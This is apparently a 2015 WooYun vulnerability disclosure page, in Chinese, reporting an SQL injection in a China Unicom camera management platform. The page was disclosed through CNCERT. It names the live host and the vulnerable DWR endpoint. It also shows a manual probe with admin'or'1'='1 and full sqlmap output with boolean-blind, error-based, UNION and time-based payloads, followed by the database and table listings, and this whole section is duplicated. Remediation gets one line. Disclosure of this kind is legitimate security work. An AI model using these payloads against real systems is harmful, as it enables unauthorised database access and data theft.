当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121611

漏洞标题:中国联通某摄像管理平台存在SQL注入漏洞

相关厂商:中国联通

漏洞作者: 浮萍

提交时间:2015-07-06 17:01

修复时间:2015-08-24 13:04

公开时间:2015-08-24 13:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

SQL注入

详细说明:

偶然看见一个洞就有蓝v的白帽子“我是壮丁” http://www.wooyun.org/whitehats/我是壮丁
就去看看他发的漏洞
WooYun: 中国联通某摄像管理平台存在弱口令+sql注入
然后也发现了一个SQL注入
地址
http://210.22.8.98/login.action
注册一个账号
在用户设置页面添加授权管理人员
http://210.22.8.98/user/settingUser.action
已知admin用户存在
添加admin

1.jpg


提示正常
添加admin'

2.jpg


疑似有问题
添加admin'or'1'='1

3.jpg


提示正常
然后抓包

http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN


需要带cookie

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 67 HTTP(s) requ
ests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=-7303' OR (9955=9955)#&batchId=2&locale=zh_CN
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' AND (SELECT 8433 FROM(SELECT COUNT(*),CONCAT(0x71786c697
1,(SELECT (CASE WHEN (8433=8433) THEN 1 ELSE 0 END)),0x71707a7071,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Nimd'='Nimd&batch
Id=2&locale=zh_CN
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' UNION ALL SELECT CONCAT(0x71786c6971,0x66616a73435941424
854,0x71707a7071),NULL,NULL#&batchId=2&locale=zh_CN
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' AND 7962=BENCHMARK(5000000,MD5(0x424f5269)) AND 'hHRS'='
hHRS&batchId=2&locale=zh_CN
---
[14:38:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0


数据库

available databases [5]:
[*] db_register
[*] dserver_1
[*] information_schema
[*] mysql
[*] test


当前库current database: 'db_register'
其中的表

Database: db_register
[17 tables]
+---------------------+
| admin |
| admin_camera_group |
| admin_manage_camera |
| appointuser |
| appserver |
| appserverassign |
| appserverinfo |
| db_version |
| devices |
| dserver_names |
| dservers |
| groups |
| languages |
| location |
| location_names |
| news |
| users |
+---------------------+


看看users中的数据条数

4.jpg


漏洞证明:

添加admin

1.jpg


提示正常
添加admin'

2.jpg


疑似有问题
添加admin'or'1'='1

3.jpg


提示正常
然后抓包

http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN


需要带cookie

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 67 HTTP(s) requ
ests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=-7303' OR (9955=9955)#&batchId=2&locale=zh_CN
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' AND (SELECT 8433 FROM(SELECT COUNT(*),CONCAT(0x71786c697
1,(SELECT (CASE WHEN (8433=8433) THEN 1 ELSE 0 END)),0x71707a7071,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Nimd'='Nimd&batch
Id=2&locale=zh_CN
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' UNION ALL SELECT CONCAT(0x71786c6971,0x66616a73435941424
854,0x71707a7071),NULL,NULL#&batchId=2&locale=zh_CN
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' AND 7962=BENCHMARK(5000000,MD5(0x424f5269)) AND 'hHRS'='
hHRS&batchId=2&locale=zh_CN
---
[14:38:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0


数据库

available databases [5]:
[*] db_register
[*] dserver_1
[*] information_schema
[*] mysql
[*] test


当前库current database: 'db_register'
其中的表

Database: db_register
[17 tables]
+---------------------+
| admin |
| admin_camera_group |
| admin_manage_camera |
| appointuser |
| appserver |
| appserverassign |
| appserverinfo |
| db_version |
| devices |
| dserver_names |
| dservers |
| groups |
| languages |
| location |
| location_names |
| news |
| users |
+---------------------+


看看users中的数据条数

4.jpg


修复方案:

别的地方都过滤了
这个地方漏了嘛
通用让我找案例,那就不走通用了

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-07-10 13:02

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-07 12:53 | 我是壮丁 认证白帽子 ( 路人 | Rank:10 漏洞数:1 | 专业打酱油)

    可以多看看我发的文章

  2. 2015-09-07 12:54 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    @我是壮丁 搞基,没人是你的对手。

  3. 2015-09-07 15:26 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    @我是壮丁 收到